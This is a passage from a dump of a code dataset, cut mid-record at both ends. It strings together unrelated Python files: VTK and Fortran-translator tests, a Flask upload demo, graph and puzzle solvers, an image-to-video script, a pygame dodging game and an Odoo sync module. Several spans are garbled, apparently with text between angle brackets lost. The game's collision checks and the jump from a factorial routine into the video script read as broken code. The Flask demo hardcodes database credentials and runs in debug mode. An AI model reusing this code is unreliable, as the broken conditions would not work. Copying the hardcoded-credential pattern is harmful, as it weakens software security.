Node(2)\nthird = Node(3)\n\nfirst.next = second\nsecond.next = third\n\nwhile llist.head:\n print(llist.head.data)\n llist.head = llist.head.next","sub_path":"python/swea/intermediate/testlinkedlist.py","file_name":"testlinkedlist.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"35672501","text":"#!/usr/bin/env python\nfrom vtkmodules.vtkCommonDataModel import vtkDataObject\nfrom vtkmodules.vtkCommonMath import vtkRungeKutta4\nfrom vtkmodules.vtkCommonSystem import vtkTimerLog\nfrom vtkmodules.vtkFiltersCore import vtkStructuredGridOutlineFilter\nfrom vtkmodules.vtkFiltersFlowPaths import vtkStreamTracer\nfrom vtkmodules.vtkFiltersModeling import vtkRibbonFilter\nfrom vtkmodules.vtkFiltersSources import vtkPlaneSource\nfrom vtkmodules.vtkIOParallel import vtkMultiBlockPLOT3DReader\nfrom vtkmodules.vtkRenderingCore import (\n vtkActor,\n vtkPolyDataMapper,\n vtkRenderWindow,\n vtkRenderWindowInteractor,\n vtkRenderer,\n)\nimport vtkmodules.vtkInteractionStyle\nimport vtkmodules.vtkRenderingFreeType\nimport vtkmodules.vtkRenderingOpenGL2\nfrom vtkmodules.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Control test size\nres = 2\n\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtkRenderer()\nrenWin = vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# create pipeline\n#\npl3d = vtkMultiBlockPLOT3DReader()\npl3d.SetXYZFileName(VTK_DATA_ROOT + \"/Data/combxyz.bin\")\npl3d.SetQFileName(VTK_DATA_ROOT + \"/Data/combq.bin\")\npl3d.SetScalarFunctionNumber(100)\npl3d.SetVectorFunctionNumber(202)\npl3d.Update()\noutput = pl3d.GetOutput().GetBlock(0)\n\n# Create a rake of streamlines\nps = vtkPlaneSource()\nps.SetXResolution(res)\nps.SetYResolution(res)\nps.SetOrigin(2,-2,26)\nps.SetPoint1(2,2,26)\nps.SetPoint2(2,-2,32)\nps.Update()\n\npsMapper = vtkPolyDataMapper()\npsMapper.SetInputConnection(ps.GetOutputPort())\n\npsActor = vtkActor()\npsActor.SetMapper(psMapper)\npsActor.GetProperty().SetRepresentationToWireframe()\n\nrk4 = vtkRungeKutta4()\nstreamer = vtkStreamTracer()\nstreamer.SetInputData(output)\nstreamer.SetSourceData(ps.GetOutput())\nstreamer.SetMaximumPropagation(100)\nstreamer.SetInitialIntegrationStep(.2)\nstreamer.SetIntegrationDirectionToForward()\nstreamer.SetComputeVorticity(1)\nstreamer.SetIntegrator(rk4)\n\nnumStreamers = ps.GetOutput().GetNumberOfPoints()\ntimer = vtkTimerLog()\ntimer.StartTimer()\nstreamer.Update()\ntimer.StopTimer()\ntime = timer.GetElapsedTime()\nprint(\"Time to generate: {0} streamers\".format(numStreamers), \": {0}\".format(time))\n\nrf = vtkRibbonFilter()\nrf.SetInputConnection(streamer.GetOutputPort())\nrf.SetInputArrayToProcess(1, 0, 0, vtkDataObject.FIELD_ASSOCIATION_POINTS, \"Normals\")\nrf.SetWidth(0.1)\nrf.SetWidthFactor(5)\n\nstreamMapper = vtkPolyDataMapper()\nstreamMapper.SetInputConnection(rf.GetOutputPort())\nstreamMapper.SetScalarRange(output.GetScalarRange())\nstreamline = vtkActor()\nstreamline.SetMapper(streamMapper)\n\nprint(\"Output scalar range:\",output.GetScalarRange())\n\noutline = vtkStructuredGridOutlineFilter()\noutline.SetInputData(output)\n\noutlineMapper = vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\n\noutlineActor = vtkActor()\noutlineActor.SetMapper(outlineMapper)\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(psActor)\nren1.AddActor(outlineActor)\nren1.AddActor(streamline)\nren1.SetBackground(1,1,1)\nrenWin.SetSize(300,300)\nren1.SetBackground(0.1,0.2,0.4)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.95297,50)\ncam1.SetFocalPoint(9.71821,0.458166,29.3999)\ncam1.SetPosition(2.7439,-37.3196,38.7167)\ncam1.SetViewUp(-0.16123,0.264271,0.950876)\n# render the image\n#\nrenWin.Render()\nthreshold = 15\niren.Start()\n# --- end of script --\n","sub_path":"Filters/FlowPaths/Testing/Python/TestThreadedStreamTracer.py","file_name":"TestThreadedStreamTracer.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399388407","text":"from flask import Flask,render_template,request,make_response,redirect\nimport datetime\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\n\napp=Flask(__name__)\n\n#为app指定数据库的配置信息  一组字符串  说明连接到musql数据库 \napp.config['SQLALCHEMY_DATABASE_URI']='mysql://root:123456@localhost:3306/flask'\n#创建SQLALchemy的实例,并将app指定给实例\n#db是SQLAlchemy的实例,表示的是正在使用的数据库,\n# 同时db页具备SQLAlchemy中的所有功能 \ndb=SQLAlchemy(app)\n\n\n@app.route('/01-js')\ndef js_views():\n return render_template('01-js.html')\n\n@app.route('/02-get')\ndef get_views():\n name=request.args['name']\n print(type(name))\n age = request.args['age']\n return '姓名:{},年龄:{}'.format(name,age)\n\n@app.route('/03-response')\ndef response_views():\n # resp = make_response('这是使用响应对象创建的内容')\n resp=make_response(render_template('01-js.html'))\n return resp\n\n@app.route('/04-redirect')\ndef redirect_views():\n # 通过重定向的方式交给03-response\n # 跟url_for区别\n # url=url_for('response_views') 再用超链接跳转 \n return redirect('/03-response')\n\n@app.route('/05-file',methods=['GET','POST'])\ndef file_views():\n if request.method == 'GET':\n return render_template('05-file.html')\n else:\n #获取上传的文件 \n f = request.files['uimg']\n #将上传的文件保存至指定的目录处 先获取上传的文件名\n #将文件名修改为当前时间作为名称 再上传\n\n #获取运行这个程序时候的时间 精确到毫秒\n ftime = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n\n #获取文件的扩展名\n # filename = f.filename\n\n ext = f.filename.split('.')[1]\n\n filename = ftime+'.'+ext\n\n print(filename)\n # f.save('static/updata/' + filename)\n\n #将上传的文件保存至指定目录处[绝对路径]\n # dirname是去掉文件名,返回一个目录 dirname(__file__)当前文件的绝对路径\n basedir = os.path.dirname(__file__)\n print('当前文件地址:{}'.format(__file__))\n print(basedir)\n upload_path=os.path.join(basedir,'static/updata',filename)\n print(upload_path)\n f.save(upload_path)\n\n return 'Upload OK'\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run(debug = True,port='8000')","sub_path":"python flask/day4/Flask04.py","file_name":"Flask04.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"395062464","text":"from sets import Set\nimport re\nimport itertools\n\nclass Graph:\n\n\tdef __init__(self, filename):\n\t\tself.nodes = set() #represent a set of all nodes of the graph\n\t\tself.edges = [] #represent each edge of nodes in the graph using a list of tuples eg. 'a' - 'b' [('a','b')]\n\t\tself.adjacencyMatrix = []\n\t\tself.mapNodes = {} #dictionary that maps each character into a a int starting from 0 to len(self.nodes) - 1\n\t\tself.subNodes = set()\n\n\t\t#----PARSING THE DOT FILE-----\n\t\tlines = [line.rstrip() for line in open(filename)][1:] #load each line of the document into each element of the list lines starting from the 2nd line\n\t\t\n\t\tfor line in lines:\n\t\t\tmatch = re.search(r'\\s*(\\w+)\\s*--\\s*(\\w+);.*', line) #try match the line with the pattern of 2 nodes\n\t\t\tif match:\n\t\t\t\tself.nodes.add(match.group(1))\n\t\t\t\tself.nodes.add(match.group(2))\n\t\t\t\tself.edges.append((match.group(1),match.group(2)))\n\n\t\t\tmatch = re.search(r'\\s*(\\w+)\\s*;.*', line) #try match line with pattern of 1 node\n\t\t\tif match:\n\t\t\t\tself.nodes.add(match.group(1))\n\t\t\t\tself.edges.append((match.group(1),))\n\n\t\t\n\t\tself.nodes = list(self.nodes)\t\t\n\n\t\t\n\t\t#create a zeros matrix len(nodes)xlen(nodes)\n\t\tself.adjacencyMatrix = [[0 for i in range(len(self.nodes))] for j in range(len(self.nodes))]\n\n\t\tfor i in range(len(self.nodes)): #map each char to a int in the range [0,len(nodes)[\n\t\t\tself.mapNodes[self.nodes[i]] = i\n\n\t\t#building the adjacency matrix using the mapNodes to know which row,column to fill the discrete value 0 | 1\n\t\tfor edge in self.edges:\n\t\t\tif len(edge) == 2:\n\t\t\t\tself.adjacencyMatrix[self.mapNodes[edge[0]]][self.mapNodes[edge[1]]] = 1\n\t\t\t\tself.adjacencyMatrix[self.mapNodes[edge[1]]][self.mapNodes[edge[0]]] = 1\n\n\tdef allsubgraphs(self): #return all combinations of subgraphs in a list of combinations objects\n\t\tsubgraphs = []\n\t\tfor i in range(len(self.nodes)):\n\t\t\tsubgraphs.append(itertools.combinations(range(len(self.nodes)),i+1))\n\t\treturn subgraphs\n\n\tdef isclique(self, subgraph): #given a tuple that represent a subgraph return True if it is a clique, otherwise False\n\t\tif len(subgraph) == 1: #all single subgraph is a clique\n\t\t\treturn True\n\t\t\n\t\tfor i in range(len(subgraph)):\n\t\t\tfor j in range(i+1, len(subgraph)):\n\t\t\t\t if self.adjacencyMatrix[subgraph[i]][subgraph[j]] == 0:\n\t\t\t\t \treturn False\n\t\t\treturn True\n\n\ndef maximum_clique(g):\n\tlen_cliques = [] \n\tsubgraphs = g.allsubgraphs()\n\tfor graph in subgraphs:\n\t\tfor combination in graph:\n\t\t\tif g.isclique(combination):\n\t\t\t\tlen_cliques.append(len(combination))\n\n\treturn max(len_cliques)","sub_path":"maximum_clique/p1v3.py","file_name":"p1v3.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623985797","text":"import os\nimport json\nfrom datetime import date\nimport xml.etree.ElementTree as ET\nimport subprocess as sp\nimport ast\nimport pytest\n\nfrom delphi.translators.for2py import (\n preprocessor,\n translate,\n get_comments,\n pyTranslate,\n genPGM,\n mod_index_generator,\n)\n\nfrom pathlib import Path\nfrom typing import Dict, Tuple\n\n\nDATA_DIR = \"tests/data/program_analysis\"\n\ndef get_python_source(original_fortran_file) -> Tuple[str, str, str, str, Dict]:\n stem = original_fortran_file.stem\n preprocessed_fortran_file = stem + \"_preprocessed.f\"\n lambdas_filename = stem + \"_lambdas.py\"\n json_filename = stem + \".json\"\n python_filename = stem + \".py\"\n\n with open(original_fortran_file, \"r\") as f:\n inputLines = f.readlines()\n\n with open(preprocessed_fortran_file, \"w\") as f:\n f.write(preprocessor.process(inputLines))\n\n xml_string = sp.run(\n [\n \"java\",\n \"fortran.ofp.FrontEnd\",\n \"--class\",\n \"fortran.ofp.XMLPrinter\",\n \"--verbosity\",\n \"0\",\n preprocessed_fortran_file,\n ],\n stdout=sp.PIPE,\n ).stdout\n\n trees = [ET.fromstring(xml_string)]\n comments = get_comments.get_comments(preprocessed_fortran_file)\n os.remove(preprocessed_fortran_file)\n xml_to_json_translator = translate.XMLToJSONTranslator()\n mode_mapper_tree = ET.fromstring(xml_string)\n generator = mod_index_generator.moduleGenerator()\n mode_mapper_dict = generator.analyze(mode_mapper_tree)\n outputDict = xml_to_json_translator.analyze(trees, comments)\n pySrc = pyTranslate.create_python_source_list(outputDict)[0][0]\n return pySrc, lambdas_filename, json_filename, python_filename, mode_mapper_dict\n\n\ndef make_grfn_dict(original_fortran_file) -> Dict:\n pySrc, lambdas_filename, json_filename, python_filename, mode_mapper_dict = get_python_source(original_fortran_file)\n asts = [ast.parse(pySrc)]\n _dict = genPGM.create_pgm_dict(lambdas_filename, asts, python_filename, mode_mapper_dict, save_file=False)\n for identifier in _dict[\"identifiers\"]:\n del identifier[\"gensyms\"]\n\n os.remove(lambdas_filename)\n return _dict\n\n\ndef postprocess_test_data_grfn_dict(_dict):\n \"\"\" Postprocess the test data grfn dict to change the date to the date of\n execution, and also remove the randomly generated gensyms \"\"\"\n _dict[\"dateCreated\"] = \"\".join(str(date.today()).split(\"-\"))\n for identifier in _dict[\"identifiers\"]:\n if \"gensyms\" in identifier:\n del identifier[\"gensyms\"]\n\n@pytest.fixture\ndef crop_yield_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/crop_yield.f\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef petpt_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/PETPT.for\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef io_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/io-tests/iotest_05.for\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef array_python_IR_test():\n yield get_python_source(Path(f\"{DATA_DIR}/arrays/arrays-basic-06.f\"))[0]\n\n\n@pytest.fixture\ndef derived_types_python_IR_test():\n yield get_python_source(\n Path(f\"{DATA_DIR}/derived-types/derived-types-03.f\")\n )[0]\n\n\ndef test_crop_yield_grfn_generation(crop_yield_grfn_dict):\n with open(f\"{DATA_DIR}/crop_yield.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n\n assert crop_yield_grfn_dict == json_dict\n\n\ndef test_petpt_grfn_generation(petpt_grfn_dict):\n with open(f\"{DATA_DIR}/PETPT.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n assert petpt_grfn_dict == json_dict\n\n\ndef test_io_grfn_generation(io_grfn_dict):\n with open(f\"{DATA_DIR}/io-tests/iotest_05.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n assert io_grfn_dict == json_dict\n\n\ndef test_array_pythonIR_generation(array_python_IR_test):\n with open(f\"{DATA_DIR}/arrays-basic-06.py\", \"r\") as f:\n python_src = f.read()\n assert array_python_IR_test == python_src\n\n\ndef test_derived_type_pythonIR_generation(derived_types_python_IR_test):\n with open(f\"{DATA_DIR}/derived-types-03.py\", \"r\") as f:\n python_dict = f.read()\n assert derived_types_python_IR_test == python_dict\n","sub_path":"tests/test_program_analysis.py","file_name":"test_program_analysis.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142062418","text":"#!/usr/bin/env python3\n\nimport json, requests\n\namitt_tactic_mapping = {}\namitt_technique_mapping = {}\namitt_mitigation_mapping = {}\n\namitt_json_url = (\"https://raw.githubusercontent.com/cogsec-collaborative/amitt_cti/master/amitt/amitt-attack.json\")\n\namitt_json = requests.get(amitt_json_url).json()\n\nfor object in amitt_json[\"objects\"]:\n if object['type'] == \"course-of-action\" and \"M\" in \\\n object['external_references'][0]['external_id']:\n mitigation_id = object['external_references'][0]['external_id']\n mitigation_name = object['name']\n amitt_mitigation_mapping.update({ mitigation_id: mitigation_name })\n elif object['type'] == \"attack-pattern\":\n technique_id = object['external_references'][0]['external_id']\n technique_name = object['name']\n amitt_technique_mapping.update({ technique_id: technique_name })\n elif object['type'] == \"x-mitre-matrix\":\n tactics_matrix = object['tactic_refs']\n for each_object in amitt_json[\"objects\"]:\n if each_object['id'] in tactics_matrix:\n tactic_id = each_object['external_references'][0]['external_id']\n tactic_name = each_object['name']\n tactic_tag = \"amitt.\" + each_object['name'].lower().replace(\" \", \"_\")\n amitt_tactic_mapping[tactic_tag] = [tactic_name, tactic_id]\n\n\nwith open('amitt_mapping.py', 'w') as fp:\n fp.write(\"amitt_tactic_mapping = \" + json.dumps(amitt_tactic_mapping,indent=4) + '\\n')\n fp.write(\"amitt_technique_mapping = \" + json.dumps(amitt_technique_mapping,indent=4) + '\\n')\n fp.write(\"amitt_mitigation_mapping = \" + json.dumps(amitt_mitigation_mapping,indent=4))\n","sub_path":"scripts/update_amitt_mapping.py","file_name":"update_amitt_mapping.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"51847708","text":"class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n if len(s) == 0:\n return []\n if len(s) == 1:\n return [[s]]\n result = []\n if self.isPalindrome(s):\n result.append([s])\n for i in range(1, len(s)):\n head = s[:i]\n if not self.isPalindrome(head):\n continue\n tailPartion = self.partition(s[i:])\n result.extend([[head] + item for item in tailPartion])\n return result\n\n def isPalindrome(self, s):\n begin, end = 0, len(s) - 1\n while begin < end:\n if s[begin] != s[end]:\n return False\n else:\n begin += 1\n end -= 1\n return True\n","sub_path":"palindrome_partitioning.py","file_name":"palindrome_partitioning.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44702907","text":"import math\r\nfrom tqdm import tqdm\r\n\r\ndef build_prime_list(bound):\r\n ns = [1]*(bound+1)\r\n primes = []\r\n for n in range(2,bound+1):\r\n if ns[n] == 1:\r\n primes.append(n)\r\n for k in range(n**2,bound+1,n):\r\n ns[k] = 0\r\n return primes\r\n\r\ndef factorial_valuation(n,p):\r\n # returns the valuation of n! at the prime p.\r\n total = 0\r\n while n:\r\n total += n//p\r\n n = n//p\r\n return total\r\n\r\ndef factor_factorial(n):\r\n primes = build_prime_list(n)\r\n factorization = {p:factorial_valuation(n,p) for p in primes}\r\n return factorization\r\n\r\n#print(factor_factorial(70))\r\ndef problem646(n,lb,ub):\r\n factored = factor_factorial(n)\r\n d1,d2 = [1],[1]\r\n for p in factored:\r\n if len(d1) > len(d2):\r\n new_d = []\r\n for e in range(1,factored[p]+1):\r\n new_d += [x*(-p)**e for x in d2]\r\n d2 += new_d\r\n else:\r\n new_d = []\r\n for e in range(1,factored[p]+1):\r\n new_d += [x*(-p)**e for x in d1]\r\n d1 += new_d\r\n d1.sort(key=abs)\r\n d2.sort(key=abs)\r\n\r\n total = 0\r\n # Strategy: fix D from d1.\r\n # Keep track of the min index i0 so that |d2[i]*D| < lb for all i 0 and width > 0:\n save_fname = '{}_{}x{}'.format(save_fname, width, height)\n\n if out_postfix:\n save_fname = '{}_{}'.format(save_fname, out_postfix)\n\n if reverse:\n save_fname = '{}_r{}'.format(save_fname, reverse)\n\n save_path = os.path.join(os.path.dirname(src_path), '{}.{}'.format(save_fname, ext))\n\n if src_root_dir and save_root_dir:\n save_path = save_path.replace(src_root_dir, save_root_dir)\n print('save_path: {}'.format(save_path))\n print('src_root_dir: {}'.format(src_root_dir))\n print('save_root_dir: {}'.format(save_root_dir))\n print('save_path: {}'.format(save_path))\n # sys.exit()\n\n if os.path.exists(save_path):\n dst_mtime = os.path.getmtime(save_path)\n src_mtime = os.path.getmtime(src_path)\n\n dst_mtime_fmt = datetime.fromtimestamp(dst_mtime).strftime('%Y-%m-%d %H:%M:%S')\n src_mtime_fmt = datetime.fromtimestamp(src_mtime).strftime('%Y-%m-%d %H:%M:%S')\n\n print('Output video file already exists: {}'.format(save_path))\n\n if dst_mtime >= src_mtime:\n print('Last modified time: {} is not older than the source: {} so skipping it'.format(\n dst_mtime_fmt, src_mtime_fmt\n ))\n save_path = ''\n continue\n else:\n print('Last modified time: {} is older than the source: {} so overwriting it'.format(\n dst_mtime_fmt, src_mtime_fmt\n ))\n\n save_dir = os.path.dirname(save_path)\n if save_dir and not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n if height <= 0 or width <= 0:\n temp_img = cv2.imread(os.path.join(src_path, src_files[0]))\n height, width, _ = temp_img.shape\n\n if codec == 'H265':\n video_out = VideoWriterGPU(save_path, fps, (width, height))\n else:\n fourcc = cv2.VideoWriter_fourcc(*codec)\n video_out = cv2.VideoWriter(save_path, fourcc, fps, (width, height))\n\n if video_out is None:\n raise IOError('Output video file could not be opened: {}'.format(save_path))\n\n print('Saving {}x{} output video to {}'.format(width, height, save_path))\n\n frame_id = start_id\n pause_after_frame = 0\n print_diff = max(1, int(n_src_files / 100))\n start_t = time.time()\n while True:\n filename = src_files[frame_id]\n file_path = os.path.join(src_path, filename)\n if not os.path.exists(file_path):\n raise SystemError('Image file {} does not exist'.format(file_path))\n\n image = cv2.imread(file_path)\n\n image = resizeAR(image, width, height)\n\n if show_img:\n cv2.imshow(seq_name, image)\n k = cv2.waitKey(1 - pause_after_frame) & 0xFF\n if k == 27:\n exit_prog = 1\n break\n elif k == ord('q'):\n break\n elif k == 32:\n pause_after_frame = 1 - pause_after_frame\n\n video_out.write(image)\n\n frame_id += 1\n\n if frame_id % print_diff == 0:\n end_t = time.time()\n fps = float(print_diff) / (end_t - start_t)\n sys.stdout.write('\\rDone {:d}/{:d} frames at {:.4f} fps'.format(\n frame_id - start_id, n_src_files - start_id, fps))\n sys.stdout.flush()\n start_t = end_t\n\n if n_frames > 0 and (frame_id - start_id) >= n_frames:\n break\n\n if frame_id >= n_src_files:\n break\n\n sys.stdout.write('\\n\\n')\n sys.stdout.flush()\n\n video_out.release()\n\n if show_img:\n cv2.destroyWindow(seq_name)\n\n if del_src:\n print('Removing source folder {}'.format(src_path))\n shutil.rmtree(src_path)\n\n save_path = ''\n\n if exit_prog:\n break\n","sub_path":"imgSeqToVideo.py","file_name":"imgSeqToVideo.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273553407","text":"import pygame\r\nfrom pygame.locals import *\r\nimport time\r\npygame.init()\r\nimport random\r\nscreen = pygame.display.set_mode((500,500))\r\nimport os\r\nimport sys\r\nimport threading\r\nfile = 'D:/sample_game.py'\r\nred = (255,0,0)\r\ngame_over = False\r\nplayer_speed = 40\r\nx = 210\r\ny = 400\r\nfps = 60\r\nenemy_speed = 5\r\nspace_shuttle = pygame.image.load('D:/DOCUMENTS/Downloads/transport.png')\r\nmyfont = pygame.font.SysFont('Comic Sans MS',50)\r\nnewfont = pygame.font.SysFont('bahaus 93',30)\r\nplayer_sprite = pygame.image.load('D:/DOCUMENTS/Downloads/space-shuttle.png')\r\n#five enemies\r\nx1 = random.randint(0,500)\r\ne_y = 0\r\ne2_y = 0\r\ne3_y = 0\r\ne4_y = 0\r\ne5_y = 0\r\nx2 = random.randint(0,500-5)\r\nx3 = random.randint(0,500-5)\r\nx4 = random.randint(0,500-5)\r\nx5 = random.randint(0,500-5)\r\n\r\ncolor = (163,144,106)\r\nsize = 100\r\n\r\n\r\nscreen.fill((255,255,255))\r\ntextsurface = myfont.render('Space Dodgers',False,(0,255,0))\r\ninstruct_text = newfont.render('Press space to start',False,(255,50,20))\r\nscreen.blit(instruct_text,(150,200))\r\nscreen.blit(textsurface,(100,130))\r\nscreen.blit(space_shuttle,(100,250))\r\n \r\npygame.display.flip()\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef increase_difficulty():\r\n global enemy_speed\r\n while True:\r\n time.sleep(10)\r\n enemy_speed += 2\r\n\r\n\r\ndef restart(sc,enemy_y,player_x):\r\n print(sc)\r\n retry = input('GAME OVER DO YOU WANT TO RETRY[YES,NO]')\r\n if retry == 'Yes':\r\n enemy_y = 0\r\n player_x = 210\r\n sc = 0\r\n game_loop()\r\n sys.exit\r\n \r\ndef game_loop():\r\n start_incrdiff = threading.Thread(target=increase_difficulty)\r\n start_incrdiff.start()\r\n global x1\r\n global y\r\n global e_y\r\n global e2_y\r\n global e3_y\r\n global e4_y\r\n global e5_y\r\n global color\r\n global size\r\n \r\n global x\r\n global x2\r\n global x3\r\n global x4\r\n global x5\r\n\r\n score = 0\r\n game_f = True \r\n \r\n while game_f:\r\n e_y += enemy_speed\r\n current_score = 'Score:' + str(score)\r\n score_text = newfont.render(current_score,False,(136,85,95))\r\n \r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n if event.type == KEYDOWN:\r\n if event.key == K_LEFT:\r\n x -= player_speed\r\n if event.key == K_RIGHT:\r\n x += player_speed\r\n if x >= 500-59 or x < 0:\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n if x > x1 and xe_y and y < e_y+50 or x1 > x and x1 < x+50 and e_y > y and e_y < y+50:\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n if x > x2 and xe_y and y < e_y+50 or x2 > x and x2 < x+50 and e_y > y and e_y < y+50:\r\n \r\n\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n if x > x3 and xe_y and y < e_y+50 or x3 > x and x3 < x+50 and e_y > y and e_y < y+50:\r\n\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n if x > x4 and xe_y and y < e_y+50 or x4 > x and x4 < x+50 and e_y > y and e_y < y+50:\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n if x > x5 and xe_y and y < e_y+50 or x5 > x and x5 < x+50 and e_y > y and e_y < y+50:\r\n print(score)\r\n retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n if retry == 'No':\r\n sys.exit()\r\n if retry == 'Yes':\r\n x = 210\r\n e_y = 0\r\n score = 0\r\n game_loop()\r\n \r\n if e_y > y:\r\n score+=1\r\n \r\n \r\n clock.tick(fps)\r\n screen.fill((255,255,255))\r\n pygame.draw.rect(screen,color,(x1,e_y,50,50))\r\n pygame.draw.rect(screen,color,(x2,e_y,50,50))\r\n pygame.draw.rect(screen,color,(x3,e_y,50,50))\r\n pygame.draw.rect(screen,color,(x4,e_y,50,50))\r\n pygame.draw.rect(screen,color,(x5,e_y,50,50))\r\n if e_y >= 500:\r\n e_y = 0\r\n x1 = random.randint(0,500)\r\n x2 = random.randint(0,500-5)\r\n x3 = random.randint(0,500-5)\r\n x4 = random.randint(0,500-5)\r\n x5 = random.randint(0,500-5)\r\n screen.blit(score_text,(350,2))\r\n pygame.draw.rect(screen,(255,0,00),(x,y,50,50))\r\n pygame.display.flip()\r\n pygame.display.update()\r\n \r\nwhile True:\r\n for event in pygame.event.get():\r\n if event.type == KEYDOWN:\r\n if event.key == K_SPACE:\r\n print(event.key)\r\n \r\n \r\n game_loop()\r\n pygame.display.flip()\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"Space Dodgers.py","file_name":"Space Dodgers.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"303642171","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution, third party addon\n# Copyright (C) 2004-2016 Vertel AB ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nimport openerp.exceptions\nfrom openerp import models, fields, api, _\nimport datetime\nfrom datetime import timedelta\nimport csv\nimport os\nimport tempfile\nimport base64\nfrom openerp.tools.safe_eval import safe_eval as eval\n\ntry:\n import odoorpc\nexcept:\n pass\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\n\nclass hr_attendance(models.Model):\n _inherit = 'hr.attendance'\n \n @api.multi\n def _validate_fields(self, field_names):\n return True\n \n\nclass HrHolidays(models.Model):\n _inherit = 'hr.holidays'\n \n @api.multi\n def _validate_fields(self, field_names):\n _logger.warn('hr.holidays._validate_fields')\n return True\n\nclass base_synchro(models.TransientModel):\n _inherit = 'base.synchro'\n \n base_sync_object_ids = fields.Many2many(comodel_name='base.synchro.obj', string='Create sync lines for')\n \n @api.one\n def create_base_sync_lines(self):\n server = odoorpc.ODOO(self.server_url.server_url, port=self.server_url.server_port)\n server.login(self.server_url.server_db, self.server_url.login, self.server_url.password)\n remote_model_data = server.env['ir.model.data']\n for sync_obj in self.base_sync_object_ids:\n _logger.warn(sync_obj)\n domain = eval(sync_obj.domain)\n _logger.warn(domain)\n ids = self.pool.get(sync_obj.model_id.model).search(self._cr, self.env.user.id, domain, context=self.env.context)\n _logger.warn(ids)\n for external_id in self.env['ir.model.data'].search([('model', '=', sync_obj.model_id.model), ('res_id', 'in', ids)]):\n id = remote_model_data.search([('model', '=', sync_obj.model_id.model), ('name', '=', external_id.name), ('module', '=', external_id.module)])\n _logger.warn(id)\n if id:\n remote_id = remote_model_data.browse(id).res_id\n _logger.warn(remote_id)\n if not self.env['base.synchro.obj.line'].search([('remote_id', '=', remote_id), ('local_id', '=', external_id.res_id), ('obj_id', '=', sync_obj.id)]):\n self.env['base.synchro.obj.line'].create({\n 'remote_id': remote_id,\n 'local_id': 